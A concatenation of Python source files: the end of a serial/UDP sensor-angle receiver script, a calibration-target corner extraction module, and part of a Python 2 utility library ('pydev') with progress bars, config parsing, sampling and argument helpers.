                            send_data_tracknum, send_data_trackdis, send_data_bata, send_data_alpha,
                            send_data_trackrate)
    print(len(send_data))
    udp_socket.sendto(send_data, (mhesIPAddr, mhesPort))  # sendto(data, address)
def udp_recv(udp_socket):
    """Receive 4-channel samples over UDP forever, match the angle, and plot."""
    send_data = '1'
    send_data = send_data.encode('utf-8')
    # Workaround: the socket must send once before it can receive.
    udp_socket.sendto(send_data, ('192.168.3.10', 7))
    count = 0
    while True:
        receive_message, client = udp_socket.recvfrom(4096)
        # '<4q' = four little-endian long longs (the board is little-endian;
        # the network debugging assistant displays big-endian).
        data = struct.unpack('<4q', receive_message)
        warning = "板子是小端,网络调试助手是大端!!!"
        count = count + 1
        print("Raw_CH1_data:%.15f\nRaw_CH2_data:%.15f\nRaw_CH3_data:%.15f\nRaw_CH4_data:%.15f" % (
            data[0], data[1], data[2], data[3]))
        matched_angle = SelectAngle(data[0], data[1], data[2], data[3])
        Print4(count, data[0], data[1], data[2], data[3], matched_angle)
        print("当前角度为: %d°" % matched_angle)
        print("\n\n")
def main():
    """Entry point: collect configuration, load reference data, then start the
    serial-receive worker thread (the UDP receive path is kept but disabled).
    """
    GetInfo()
    SelectData()
    a = input("Press any key to start.")
    print("等待接收数据")
    global udp_socket
    global matched_angle
    PC_IPAddr = get_host_ip()
    PC_Port = 8080
    udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  # create UDP socket
    udp_socket.bind((PC_IPAddr, PC_Port))  # bind the server ip/port
    # Receive over the serial port in a background thread.
    t = threading.Thread(target=USB_recv)
    t.start()
def get_host_ip():
    """Return the local IP address used to reach the public internet.

    Opens a UDP socket and "connects" it to a public address (UDP connect
    sends no packets); the kernel then selects the outgoing interface, whose
    address is read back with getsockname().

    Returns:
        str: the local IPv4 address.

    Raises:
        OSError: if no route to the probe address is available.
    """
    # Create the socket *before* the try block: in the original code a
    # failure inside socket() would leave `s` unbound and the finally clause
    # would raise NameError instead of the real error.
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.connect(('8.8.8.8', 80))
        ip = s.getsockname()[0]
    finally:
        s.close()
    return ip
def USB_recv():
    """Read framed hex samples from the serial port forever, smooth the matched
    angle over a 5-sample window and forward the average via UDP.

    NOTE(review): infinite loop -- the trailing ser.close() is unreachable.
    Relies on module globals: udp_socket, matched_angle_buff, matched_angle_mid.
    """
    ser = serial.Serial("COM5", 115200)
    ser.close()
    ser.open()
    num = 66  # bytes per serial frame (64 hex chars + "\r\n")
    count = 0
    global matched_angle_buff
    global matched_angle_mid
    while True:
        # Strip the line terminator; the remaining 64 chars are four 16-digit
        # hex fields, one per channel.
        USB_recv_data = ((ser.read(num)).decode('ASCII')).replace("\r\n", "")
        USB_recv_data = bytes(USB_recv_data, encoding="utf8")
        data = []
        data.append(int(("0x" + (USB_recv_data[0: 16].decode())), 16))
        data.append(int(("0x" + (USB_recv_data[16: 32].decode())), 16))
        data.append(int(("0x" + (USB_recv_data[32: 48].decode())), 16))
        data.append(int(("0x" + (USB_recv_data[48: 64].decode())), 16))
        count = count + 1
        print("Raw_CH1_data:%.15f\nRaw_CH2_data:%.15f\nRaw_CH3_data:%.15f\nRaw_CH4_data:%.15f" % (
            data[0], data[1], data[2], data[3]))
        matched_angle = SelectAngle(data[0], data[1], data[2], data[3])
        matched_angle_buff.append(matched_angle)
        if len(matched_angle_buff) >= 5:
            # Average the buffered angles to smooth the data.
            matched_angle_mid = sum(matched_angle_buff) / (len(matched_angle_buff) * 1.0)
            matched_angle_buff = []
            udp_send(udp_socket, matched_angle_mid)
        Print4(count, data[0], data[1], data[2], data[3], matched_angle_mid)
        print("\033[31m当前角度为:{} \033[0m".format(matched_angle))
        print("\n\n")
    ser.close()
def GetInfo():
    """Interactively collect database / network settings into module globals.

    Only DB_IPAddr and DB_Name are actually prompted for; the distance /
    table-name collection below is disabled.
    """
    global DB_IPAddr
    global DB_Name
    global distance
    global NowTime
    global PC_IPAddr
    global PC_Port
    global TableName
    DB_IPAddr = input("请输入数据库IP地址(默认192.168.3.2):192.168.")
    if DB_IPAddr == "":
        # Empty answer -> use the default address.
        DB_IPAddr = "192.168.3.2"
        print("192.168.3.2")
    else:
        # Only the last two octets are typed; prepend the fixed prefix.
        DB_IPAddr = "192.168." + DB_IPAddr
        print(DB_IPAddr)
        pass
    DB_Name = input("请输入数据库名(默认uav_data):")
    if DB_Name == "":
        DB_Name = "uav_data"
        print(DB_Name)
    else:
        print(DB_Name)
        pass
    # Disabled distance / table-name collection, kept for reference:
    # while True:
    #     distance = input("距离:")
    #     if distance != "":
    #         break
    #     else:
    #         print("\033[31m请输入距离!\033[0m")
    # NowTime = datetime.datetime.now().strftime('%Y%m%d%H%M')
    # PC_IPAddr = get_host_ip()
    # PC_Port = 8080
    # TableName = "m" + distance + "d" + NowTime
# Standard script entry guard.
if __name__ == '__main__':
    main()
|
TargetExtractor.py | import sm
import numpy as np
import sys
import multiprocessing
import queue
import time
import copy
import cv2
def multicoreExtractionWrapper(detector, taskq, resultq, clearImages, noTransformation):
    """Worker loop: pull (idx, stamp, image) tasks until the task queue is empty.

    Successful detections are pushed to resultq as (observation, idx); the
    worker exits when get_nowait() raises queue.Empty.
    """
    while True:
        try:
            task = taskq.get_nowait()
        except queue.Empty:
            return
        idx, stamp, image = task
        find = detector.findTargetNoTransformation if noTransformation else detector.findTarget
        success, obs = find(stamp, np.array(image))
        if clearImages:
            # Drop the image payload to keep the result queue light.
            obs.clearImage()
        if success:
            resultq.put((obs, idx))
def extractCornersFromDataset(dataset, detector, multithreading=False, numProcesses=None, clearImages=True, noTransformation=False):
    """Detect calibration-target corners on every image of `dataset`.

    Args:
        dataset: image source providing numImages() and readDataset()
            (yields (timestamp, image) pairs).
        detector: target detector exposing findTarget() /
            findTargetNoTransformation().
        multithreading: if True, fan work out over worker processes.
        numProcesses: worker count; defaults to max(1, cpu_count()-1).
        clearImages: drop the image from each observation to save memory.
        noTransformation: use the no-transformation detector variant.

    Returns:
        list of successful target observations, ordered by image index.
    """
    print("Extracting calibration target corners")
    targetObservations = []
    numImages = dataset.numImages()
    # prepare progress bar
    iProgress = sm.Progress2(numImages)
    iProgress.sample()
    if multithreading:
        if not numProcesses:
            numProcesses = max(1,multiprocessing.cpu_count()-1)
        try:
            manager = multiprocessing.Manager()
            resultq = manager.Queue()
            manager2 = multiprocessing.Manager()
            taskq = manager2.Queue()
            # Enqueue every image as an (idx, timestamp, image) task.
            for idx, (timestamp, image) in enumerate(dataset.readDataset()):
                taskq.put( (idx, timestamp, image) )
            plist=list()
            for pidx in range(0, numProcesses):
                detector_copy = copy.copy(detector)
                p = multiprocessing.Process(target=multicoreExtractionWrapper, args=(detector_copy, taskq, resultq, clearImages, noTransformation, ))
                p.start()
                plist.append(p)
            # Wait for the workers, sampling the progress bar from the
            # task-queue backlog.  NOTE(review): qsize() is approximate on
            # some platforms; it is only used for progress display here.
            last_done=0
            while 1:
                if all([not p.is_alive() for p in plist]):
                    time.sleep(0.1)
                    break
                done = numImages-taskq.qsize()
                sys.stdout.flush()
                if (done-last_done) > 0:
                    iProgress.sample(done-last_done)
                    last_done = done
                time.sleep(0.5)
            # Sentinel so the draining iter() below knows where to stop.
            resultq.put('STOP')
        except Exception as e:
            raise RuntimeError("Exception during multithreaded extraction: {0}".format(e))
        # Get results sorted by time (=idx).
        if resultq.qsize() > 1:
            targetObservations = [[]]*(resultq.qsize()-1)
            for lidx, data in enumerate(iter(resultq.get, 'STOP')):
                obs=data[0]; time_idx = data[1]
                targetObservations[lidx] = (time_idx, obs)
            targetObservations = list(zip(*sorted(targetObservations, key=lambda tup: tup[0])))[1]
        else:
            targetObservations=[]
    # single threaded implementation
    else:
        for timestamp, image in dataset.readDataset():
            if noTransformation:
                success, observation = detector.findTargetNoTransformation(timestamp, np.array(image))
            else:
                success, observation = detector.findTarget(timestamp, np.array(image))
            if clearImages:
                observation.clearImage()
            if success == 1:
                targetObservations.append(observation)
            iProgress.sample()
    if len(targetObservations) == 0:
        print("\r")
        sm.logFatal("No corners could be extracted for camera {0}! Check the calibration target configuration and dataset.".format(dataset.topic))
    else:
        print("\r Extracted corners for %d images (of %d images) " % (len(targetObservations), numImages))
    # close all opencv windows that might be open
    cv2.destroyAllWindows()
    return targetObservations
|
pydev.py | #! /bin/env python
# encoding=utf-8
# gusimiu@baidu.com
# datemark: 20150428
#
# V1.6:
# add TempStorage.
#
# V1.5:
# add png_to_array
#
# V1.4:
# add zip_channel, index_to_one_hot
#
# V1.3:
# add DimAnalysis
#
# V1.2:
# add FileProgress
#
# V1.1:
# add MailSender and Arg
#
# V1.0.6 change::
# add xfind
# xfind: set operation. treat file as set.
#
# V1.0.5 change::
# add VarConf and RandomItemGenerator
#
# V1.0.4 change::
# add topkheap from zhangduo@
#
# V1.0.3 change::
# add Timer.
#
# V1.0.2 change::
# add Mapper mode. (--mapper)
#
# V1.0.1 change::
# dump(self, stream, sort)
#
# V1.0
# complete code.
#
import os
import re
import logging
import traceback
import socket
import sys
import time
from multiprocessing import *
import heapq
import itertools
import random
import ConfigParser
import argparse
import json
import cPickle as cp
#import threading
# Width of the fixed ASCII-decimal length header prefixing every message.
HEADER_LENGTH = 8
# Liveness-probe message used by detect(); a live service answers 'YES'.
DETECTIVE_MSG = 'Are_you_alive?'
##############################################################################
# Part I: pydev library implemention.
#
##############################################################################
class ColorString:
    """ANSI terminal color helpers.

    Each helper wraps a string in the matching escape sequence and resets the
    color afterwards (TC_NONE).
    """

    TC_NONE ="\033[m"
    TC_RED ="\033[0;32;31m"
    TC_LIGHT_RED ="\033[1;31m"
    TC_GREEN ="\033[0;32;32m"
    TC_LIGHT_GREEN ="\033[1;32m"
    TC_BLUE ="\033[0;32;34m"
    TC_LIGHT_BLUE ="\033[1;34m"
    TC_DARY_GRAY ="\033[1;30m"
    TC_CYAN ="\033[0;36m"
    TC_LIGHT_CYAN ="\033[1;36m"
    TC_PURPLE ="\033[0;35m"
    TC_LIGHT_PURPLE ="\033[1;35m"
    TC_BROWN ="\033[0;33m"
    TC_YELLOW ="\033[1;33m"
    TC_LIGHT_GRAY ="\033[0;37m"
    TC_WHITE ="\033[1;37m"

    def __init__(self):
        pass

    @staticmethod
    def colors(s, color):
        # color escape + text + reset escape
        return ''.join((color, s, ColorString.TC_NONE))

    @staticmethod
    def red(s):
        return ColorString.colors(s, ColorString.TC_RED)

    @staticmethod
    def yellow(s):
        return ColorString.colors(s, ColorString.TC_YELLOW)

    @staticmethod
    def green(s):
        return ColorString.colors(s, ColorString.TC_GREEN)

    @staticmethod
    def blue(s):
        return ColorString.colors(s, ColorString.TC_BLUE)

    @staticmethod
    def cyan(s):
        return ColorString.colors(s, ColorString.TC_CYAN)
class TempStorage:
    '''
    Temperory store the program data.  (Python 2: cPickle + print-to-stderr.)
    Usage:
        ts = TempStorage(sign='# your sign for each run.', filename=filename)
        if ts.has_data():
            # load data from ts.
            m = ts.read()
            n = ts.read()
            ...
        else:
            # do initialize calculation.
            ...
            # then serialize to ts.
            ts.write(m)
            ts.write(n)
            ...
    '''
    def __init__(self, sign, filename):
        # Try to load a cached file whose first pickled object matches `sign`.
        self.__has_data = False
        self.__sign = sign
        try:
            self.__fd = open(filename, 'r')
            filesign = self.read()
            if filesign == sign:
                # okay, matched.
                print >> sys.stderr, 'Data is in tempStorage.'
                self.__has_data = True
                return
            else:
                print >> sys.stderr, 'File exists, but not match sign:[%s]!=[%s]' % (filesign, sign)
        except:
            # NOTE(review): bare except deliberately treats any failure
            # (missing file, unpickle error) as "no cached data".
            print >> sys.stderr, 'Data is not ready [%s] for sign [%s]' % (filename, sign)
        # No usable cache: recreate the file and stamp it with the sign.
        self.__has_data = False
        self.__fd = open(filename, 'w')
        self.write(self.__sign)
    def has_data(self):
        # True when the cache file existed and its sign matched.
        return self.__has_data
    def write(self, obj):
        # Append one pickled object to the cache file.
        return cp.dump(obj, self.__fd)
    def read(self):
        # Read the next pickled object from the cache file.
        return cp.load(self.__fd)
class StringTable:
def __init__(self, col, sep_col='\t', sep_row='\n', makeup=True):
self.__column_num = col
self.set_seperator(sep_col, sep_row)
self.__makeup = makeup
self.__data = []
def set_seperator(self, sep_col, sep_row):
self.__sep_column = sep_col
self.__sep_row = sep_row
def append(self, item):
self.__data.append(str(item))
def set(self, data):
self.__data = map(lambda x:str(x), data)
def __str__(self):
out = ''
rid = 0
cid = 0
for i, item in enumerate(self.__data):
out += item
cid += 1
if cid % self.__column_num == 0:
out += self.__sep_row
else:
out += self.__sep_column
if self.__makeup:
rest_col = self.__column_num - ((len(self.__data)-1) % self.__column_num + 1)
for i in range(rest_col):
out += self.__sep_column
return out
class SplitFileWriter:
    """Write lines across numbered part files (<prefix>.0, <prefix>.1, ...),
    rolling to the next part every `records_each_file` records.  An optional
    header line is repeated at the top of every part.  (Python 2 code.)"""
    def __init__(self, filename_prefix, records_each_file=50000, header=None):
        self.__cur_id = 0
        self.__rec_num = 0
        self.__rec_each_file = records_each_file
        self.__filename_prefix = filename_prefix
        self.__header = header
        self.__fd = None
        self.__open_next()
    def write(self, line):
        print >> self.__fd, line
        self.__rec_num += 1
        if self.__rec_num >= self.__rec_each_file:
            self.__open_next()
    def __open_next(self):
        # NOTE(review): the previous part file is never explicitly closed;
        # it is left to garbage collection.
        self.__fd = file('%s.%d' % (self.__filename_prefix, self.__cur_id), 'w')
        if self.__header:
            print >> self.__fd, self.__header
        self.__rec_num = 0
        self.__cur_id += 1
class DimInfo:
    """Distribution of a metric across categories: each category maps to a
    [ratio, score] pair.  Supports JSON (de)serialization and a diff analysis
    that attributes a total-score change to ratio vs. score shifts.
    (Python 2 code: iteritems, print-to-stream statements.)"""
    def __init__(self, name=None):
        self.name = name
        self.distribution = {}
    def set(self, typename, ratio, score):
        self.distribution[typename] = [ratio, score]
    def uniform_ratio(self):
        # Normalize the ratios so they sum to 1 (no-op if the sum is 0).
        sum = 0
        for key, (ratio, score) in self.distribution.iteritems():
            sum += ratio
        if sum>0:
            for key in self.distribution:
                self.distribution[key][0] = self.distribution[key][0] * 1.0 / sum
    def write(self, stream):
        # One line: json(name) <TAB> json(distribution)
        print >> stream, '%s\t%s\n' % (json.dumps(self.name), json.dumps(self.distribution))
    def read(self, stream):
        line = stream.readline()
        key, value = line.split('\t')
        self.name = json.loads(key)
        self.distribution = json.loads(value)
    def score(self):
        # Ratio-weighted score; normalizes ratios first (mutates self).
        self.uniform_ratio()
        ret = 0
        for (ratio, score) in self.distribution.values():
            ret += ratio * score
        return ret
    def compare(self, A):
        ''' analysis what makes diff from A to B (self).

        Prints, to stderr, the score delta split into a "distribution" part
        (ratios changed, scores held at B) and a "score" part (scores
        changed, ratios held at B), plus the top-5 per-category diffs.
        '''
        final_score_A = A.score()
        final_score_B = self.score()
        print >> sys.stderr, 'score of A: %8.3f' % (final_score_A)
        print >> sys.stderr, 'score of B: %8.3f' % (final_score_B)
        print >> sys.stderr, ' diff: %8.3f' % (final_score_B - final_score_A)
        print >> sys.stderr, '-------------------------------------------'
        # Counterfactual scores: hold one factor fixed at a time.
        distribution_score = 0
        score_score = 0
        top_diff = []
        for key, (ratio_B, score_B) in self.distribution.iteritems():
            ratio_A, score_A = A.distribution.get(key, (0, 0))
            distribution_score += ratio_A * score_B
            score_score += ratio_B * score_A
            diff_score = score_B * ratio_B - score_A * ratio_A
            top_diff.append( (key, diff_score, 'B:%.1f%% x %.2f => A:%.1f%% x %.2f' %
                (ratio_B*100., score_B, ratio_A*100., score_A )) )
        # Categories present only in A contribute their full negative weight.
        for key, (ratio_A, score_A) in A.distribution.iteritems():
            if key in self.distribution:
                continue
            top_diff.append( (key, -score_A*ratio_A, 'B:%.1f%% x %.2f => A:%.1f%% x %.2f' %
                (0, 0, ratio_A*100., score_A )) )
        delta_distribution = final_score_B - distribution_score
        delta_score = final_score_B - score_score
        print >> sys.stderr, 'Diff by distribution : %8.3f (%.3f->%.3f)' % (
            delta_distribution, final_score_B, distribution_score)
        print >> sys.stderr, 'Diff by score : %8.3f (%.3f->%.3f)' % (
            delta_score, final_score_B, score_score)
        print >> sys.stderr, '-------------------------------------------'
        for key, diff, info in sorted(top_diff, key=lambda x:-abs(x[1]))[:5]:
            print >> sys.stderr, '%30s\t%8.3f' % (key, diff)
            print >> sys.stderr, '%30s\t : %s' % ('', info)
    def debug(self, stream):
        # Dump the distribution sorted by descending ratio.
        print >> stream, '----------------[[ %s ]]----------------' % self.name
        for key, (ratio, score) in sorted(self.distribution.iteritems(), key=lambda x:-x[1][0]):
            print >> stream, '%30s\t%8.3f\t%5.1f%%' % (key, score, ratio*100.)
class ProgressBar:
    """Text progress bar: '[name] [===>   ] [ pp.ppp% ]' written to a stream.

    Call start(name, total) once, then inc(vol) as work completes; each inc()
    redraws the bar with a carriage return and appends a newline at 100%.
    """

    def __init__(self):
        self.__label = None
        self.__pct = 0.0
        self.__done = 0.0
        self.__goal = 100.0

    def __progress_info(self):
        filled = int(self.__pct)
        return '[%s] [%s>%s] [ %3.3f%% ]' % (
            self.__label,
            '=' * filled,
            ' ' * (99 - filled),
            self.__pct,
        )

    def start(self, name, total=100.0, stream=sys.stderr):
        """Reset the bar and draw it at 0%."""
        self.__label = name
        self.__pct = 0
        self.__done = 0.0
        self.__goal = total
        self.__out = stream
        self.__out.write(self.__progress_info())

    def inc(self, vol):
        """Advance by `vol` units and redraw (CR-overwrite in place)."""
        self.__done += vol
        self.__pct = 100.0 * self.__done / self.__goal
        self.__out.write('%c%s' % (13, self.__progress_info()))
        if self.__done >= self.__goal:
            self.__out.write('\n')
class FileProgress:
    """Report read progress of a seekable file on stderr.  (Python 2 code.)"""
    def __init__(self, fd, name=None):
        self.__fd = fd
        self.__name = name
        self.__last_reported = 0
        # Measure file size by seeking to the end and restoring the position.
        cur_pos = fd.tell()
        fd.seek(0, 2)
        self.__size = fd.tell()
        fd.seek(cur_pos, 0)
        print >> sys.stderr, 'FileProgress: File size reported: %d' % self.__size
    def check_progress(self, report_interval=0.0005):
        # Draw a 25-char bar when progress advanced by at least
        # `report_interval` (as a fraction of the file); returns the current
        # fraction, or 0 for unseekable/empty streams.
        if self.__size <= 0:
            print >> sys.stderr, 'FileProgress: file is stream? I cannot report for stream file.'
            return 0
        cur = 1. * self.__fd.tell() / self.__size
        if cur - self.__last_reported>report_interval:
            # 100% maps to 25 bar characters (4% per character).
            temp_c = (int(cur*100) +3) / 4;
            sys.stderr.write('%cFileProgress: process |%s>%s| [%s] of %.3f%% (%d/%d)' % (
                13, '='*temp_c, ' '*(25-temp_c), self.__name, cur*100., self.__fd.tell(), self.__size))
            self.__last_reported = cur
        return cur
    def end_progress(self):
        print >> sys.stderr, '\nProgress [%s] is over.' % (self.__name)
class MailSender:
    """Send a plain-text mail through the local sendmail binary.  (Python 2.)"""
    def __init__(self, sendmail='/usr/sbin/sendmail'):
        self.__cmd = sendmail
    def send(self, receiver, title, cont, sender='pydev.MailSender@nickgu.github.com'):
        # `receiver` may contain several space-separated addresses; they are
        # passed to sendmail as-is and comma-joined in the To: header.
        p = os.popen(self.__cmd + ' %s'%receiver, 'w')
        print >> p, 'From: pydev.MailSender<%s>' % sender
        print >> p, 'Sender: pydev.MailSender<%s>' % sender
        print >> p, 'To: %s' % ','.join(map(lambda x:'%s'%(x), receiver.split(' ')))
        print >> p, 'Subject: %s\n' % title
        print >> p, cont
        p.close()
class RandomItemGenerator:
    '''
    Reservoir sampler: feed a stream of items and keep N of them, each with
    equal probability, without knowing the stream length in advance.
    '''
    def __init__(self, N):
        self.__keep = N
        self.__sample = []
        self.__seen = 0

    def feed(self, item):
        """Offer the next item from the stream."""
        if len(self.__sample) < self.__keep:
            # Still filling the reservoir.
            self.__sample.append(item)
        else:
            # Keep the new item with probability N / (seen + 1).
            slot = random.randint(0, self.__seen)
            if slot < self.__keep:
                self.__sample[slot] = item
        self.__seen += 1

    def result(self):
        """Return the current sample (a list of at most N items)."""
        return self.__sample
# from zhangduo.
class TopkHeap(object):
    """Bounded min-heap keeping the k largest elements by key_func.

    Contributed by zhangduo.  Ties between equal keys are broken by an
    insertion counter so elements never need to be comparable themselves.
    """
    def __init__(self, k, key_func):
        self.k = k
        self.key_func = key_func
        self.data = []  # heap entries: [key, tie-break count, elem]
        self.counter = itertools.count() # unique sequence count
    def get_data(self):
        """Return the kept elements in arbitrary (heap) order."""
        return [x[2] for x in self.data]
    def sorted_data(self):
        """Return the kept elements sorted by key, largest first.

        NOTE: destructive -- drains the underlying heap.
        """
        # BUGFIX: was the Python2-only `xrange`; `range` behaves identically
        # here and also works on Python 3.
        return [x[2] for x in reversed([heapq.heappop(self.data) for x in range(len(self.data))])]
    def extend_heap(self, size):
        """Grow the capacity by `size` elements."""
        self.k += size
    def push(self, elem):
        """Offer an element; return True if it was kept, False if discarded."""
        if len(self.data) < self.k:
            count = next(self.counter)
            heapq.heappush(self.data, [self.key_func(elem), count, elem])
            return True
        else:
            # Replace the current minimum only if the new key is larger.
            small_key, _, _ = self.data[0]
            elem_key = self.key_func(elem)
            if elem_key > small_key:
                count = next(self.counter)
                heapq.heapreplace(self.data, [elem_key, count, elem])
                return True
            return False
def config_default_get(cp, section, option, default_value=None):
    """Read `section.option` from a ConfigParser-like object, falling back to
    `default_value` when the option is absent."""
    return cp.get(section, option) if cp.has_option(section, option) else default_value
def config_dict_get(cp, section, option, mapping_dict, default_key=None):
    """Read `section.option` and map the value through `mapping_dict`.

    Falls back to mapping_dict[default_key] when the option is absent; raises
    if the configured key is not in the mapping.
    """
    if not cp.has_option(section, option):
        return mapping_dict[default_key]
    key = cp.get(section, option)
    if key not in mapping_dict:
        raise Exception('configure [%s.%s] is set, but key(%s) not in dict [%s]' % (
            section, option, key, ','.join(mapping_dict.keys()) ) )
    return mapping_dict[key]
def index_to_one_hot(data_in, dim):
    '''
    One-hot encode a sequence of class indices.
    data_in : [a, b, c, d ... ]  (indices in [0, dim))
    data_out : float array of shape (len(data_in), dim) with a 1. per row.
    '''
    import numpy as np
    out = np.zeros((len(data_in), dim))
    # Vectorized scatter: set column `v` of row `idx` to 1.
    if len(data_in):
        out[np.arange(len(data_in)), np.asarray(data_in)] = 1.
    return out
def zip_channel(im, channel_num):
    """Interleave a planar image buffer for plt.imshow().

    input:  [ r, r, ..., g, g, .., b, b, ..]   (planar, channel-major)
    output: [ r, g, b, r, g, b, ..., r, g, b ] (interleaved, pixel-major)

    Raises:
        Exception: when the flat length is not divisible by channel_num.
    """
    import numpy as np
    new_im = np.array(im)
    if im.shape[0] % channel_num != 0:
        raise Exception('Channel cannot be divided by shape [%d]'
            % im.shape[0])
    # BUGFIX: use floor division -- plain '/' produces a float on Python 3,
    # which made range() below fail; on Python 2 '//' is identical for ints.
    img_size = im.shape[0] // channel_num
    for i in range(img_size):
        for c in range(channel_num):
            new_im[i * channel_num + c] = im[c*img_size + i]
    return new_im
def show_image(data):
    """Display an image array with matplotlib, axes hidden (blocks until the
    window is closed)."""
    import matplotlib.pyplot as plt
    import matplotlib.cm as cm
    plt.axis('off')
    plt.imshow(data)
    plt.show()
def png_to_array(fd):
    '''
    Decode a PNG file object into a numpy RGB array of shape (rows, cols, 3).
    Requires pypng and numpy.
    '''
    import png
    import numpy
    # asRGB() yields (width, height, row iterator, metadata dict).
    first_dim, second_dim, rows_iter, meta = png.Reader(fd).asRGB()
    flat = numpy.array(list(rows_iter))
    return flat.reshape((first_dim, second_dim, 3))
def format_time(tm):
# format time by time.time()
# print format_time(time.time())
# output sample:
# 5h4, 5m2, 23s
if tm > 3600:
return '%dh%d' % (tm//3600, tm%3600/60)
elif tm > 60:
return '%dm%d' % (tm//60, tm%60)
else:
return '%ds' % (tm)
def err(l):
    # Write one line to stderr.  (Python 2 print statement.)
    print >> sys.stderr, l
def log(l):
    # Alias of err(): write one line to stderr.  (Python 2 print statement.)
    print >> sys.stderr, l
class VarConfig:
    """ConfigParser wrapper with section templating and %(var)s substitution.

    Sections may inherit options from a template section (the relation must
    be a DAG); substitution variables come from a dedicated 'var' section,
    the section itself, and an optional caller-supplied dict.
    (Python 2 code: ConfigParser module, iteritems, `except KeyError, e`.)
    """
    def __init__(self, ):
        self.__config = {}
        self.__config_context = {}
    def read(self, filenames, var_opt=None, var_sec='var', conf_template='conf_template'):
        '''
        use var_opt(dict) and var_section to load default param.
        which will subtitute %(param)s in config.
        Step 1: load all raw conf.
            generate [(section.option, raw_info)] tuple.
        Step 2: if conf_template is set:
            makeup each conf by it's template conf.
            conf template relation must be DAG.
        Step 3:
            for section in DAG-order:
                subtitute the params.
        '''
        raw_conf = ConfigParser.ConfigParser()
        raw_conf.read(filenames)
        # step 1. read raw sections and collect template dependencies.
        dependency = {}
        section_list = list(raw_conf.sections())
        if conf_template:
            raw_conf = ConfigParser.ConfigParser()
            raw_conf.read(filenames)
            for section in raw_conf.sections():
                if raw_conf.has_option(section, conf_template):
                    dependency[section] = raw_conf.get(section, conf_template, raw=True)
        # Generate a DAG order: walk each dependency chain so templates come
        # before the sections that use them.
        dag_section_list = []
        for section in section_list:
            temp = []
            while 1:
                if section in self.__config:
                    break
                temp.insert(0, section)
                self.__config[section] = {}
                if section in dependency:
                    section = dependency[section]
                else:
                    break
            dag_section_list += temp
        # step 2. copy raw options, then fill gaps from the template section.
        for section in dag_section_list:
            for opt in raw_conf.options(section):
                value = raw_conf.get(section, opt, raw=True)
                self.__config[section][opt] = value
            self.__makeup_config(section, dependency.get(section, None))
        # step 3. build the substitution context for each section:
        # var-section defaults, then the section's own options, then var_opt.
        default_var = {}
        if var_sec:
            default_var = self.__config.get(var_sec, {})
        for section in dag_section_list:
            self.__config_context[section] = self.__overwrite_dict([default_var, self.__config[section], var_opt])
    def get(self, sec, opt, default=None, raw=False, throw_exception=True):
        # Interpolated (or raw) option lookup; `default` when absent.
        if sec in self.__config:
            if opt in self.__config[sec]:
                if raw:
                    return self.__config[sec][opt]
                return self.__interpolate(
                    self.__config[sec][opt],
                    self.__config_context[sec],
                    throw_exception=throw_exception)
        return default
    def has_section(self, sec):
        return sec in self.__config
    def has_option(self, sec, opt):
        if sec in self.__config:
            if opt in self.__config[sec]:
                return True
        return False
    def items(self, section, raw=False, throw_exception=True):
        # Yield (key, value) pairs, interpolated unless raw=True.
        for key, value in self.__config.get(section, {}).iteritems():
            if raw:
                yield key, value
            else:
                yield key, self.__interpolate(value, self.__config_context[section], throw_exception)
    def options(self, section):
        return self.__config.get(section, {}).keys()
    def sections(self):
        return self.__config.keys()
    def clear(self):
        # NOTE(review): clears only __config; __config_context is kept.
        self.__config = {}
    def __overwrite_dict(self, dict_list):
        # Merge dicts left-to-right; later dicts win; non-dicts are skipped.
        ret = {}
        for d in dict_list:
            if isinstance(d, dict):
                for key, value in d.iteritems():
                    ret[key] = value
        return ret
    def __makeup_config(self, son, father):
        # Copy options from the template section that the child lacks.
        if father is None:
            return
        for key in self.__config[father].keys():
            if key not in self.__config[son]:
                self.__config[son][key] = self.__config[father][key]
    def __interpolate(self, rawval, vars, throw_exception=True):
        ''' code from ConfigParser()
        '''
        # do the string interpolation, up to MAX_INTERPOLATION_DEPTH passes
        value = rawval
        depth = self.MAX_INTERPOLATION_DEPTH
        while depth:  # Loop through this until it's done
            depth -= 1
            if value and "%(" in value:
                value = self._KEYCRE.sub(self._interpolation_replace, value)
                try:
                    value = value % vars
                except KeyError, e:
                    if throw_exception:
                        raise Exception(('InterpolationMissingOptionError v=[%s]\n'
                            '\tbad value=%s\n'
                            '\tvals=%s\n')
                            % (value, e, vars))
            else:
                break
        if value and "%(" in value:
            if throw_exception:
                raise Exception('InterpolationDepthErro')
            else:
                logging.error('VarConf: interpolation: [%s] failed.', rawval)
        return value
    MAX_INTERPOLATION_DEPTH = 32
    _KEYCRE = re.compile(r"%\(([^)]*)\)s|.")
    def _interpolation_replace(self, match):
        # Lower-case the variable name inside %(...)s; leave other chars as-is.
        s = match.group(1)
        if s is None:
            return match.group()
        else:
            return "%%(%s)s" % s.lower()
class Arg(object):
    '''
    Thin argparse wrapper with a built-in -l/--log level option.  (Python 2
    code: str.decode/encode for gb18030 help text.)

    Sample code:
        ag=pydev.Arg()
        ag.str_opt('f', 'file', 'this arg is for file')
        opt = ag.init_arg()
        # todo with opt, such as opt.file
    '''
    def __init__(self, help='Lazy guy, no help'):
        self.is_parsed = False;
        help = help.decode('utf-8').encode('gb18030')
        self.__parser = argparse.ArgumentParser(description=help)
        self.__args = None;
        # -l --log : always available logging-level option.
        self.str_opt('log', 'l', 'logging level default=[error]', meta='[debug|info|error]');
    def __default_tip(self, default_value=None):
        # Suffix appended to help text when a default is given.
        if default_value==None:
            return ''
        return ' default=[%s]'%default_value
    def bool_opt(self, name, iname, help=''):
        # Flag option: stores 1 when present, 0 otherwise.
        help = help.decode('utf-8').encode('gb18030')
        self.__parser.add_argument(
            '-'+iname,
            '--'+name,
            action='store_const',
            const=1,
            default=0,
            help=help);
        return
    def str_opt(self, name, iname, help='', default=None, meta=None):
        # String option with short and long names.
        help = (help + self.__default_tip(default)).decode('utf-8').encode('gb18030')
        self.__parser.add_argument(
            '-'+iname,
            '--'+name,
            metavar=meta,
            help=help,
            default=default);
        pass
    def var_opt(self, name, meta='', help='', default=None):
        # Positional argument.
        # NOTE(review): the parenthesis placement differs from str_opt --
        # decode/encode is applied to the default tip only, not the
        # concatenated help string; confirm whether that is intended.
        help = (help + self.__default_tip(default).decode('utf-8').encode('gb18030'))
        if meta=='':
            meta=name
        self.__parser.add_argument(name,
            metavar=meta,
            help=help,
            default=default)
        pass
    def init_arg(self, input_args=None):
        # Parse (once) and configure logging from the --log option.
        if not self.is_parsed:
            if input_args is not None:
                self.__args = self.__parser.parse_args(input_args)
            else:
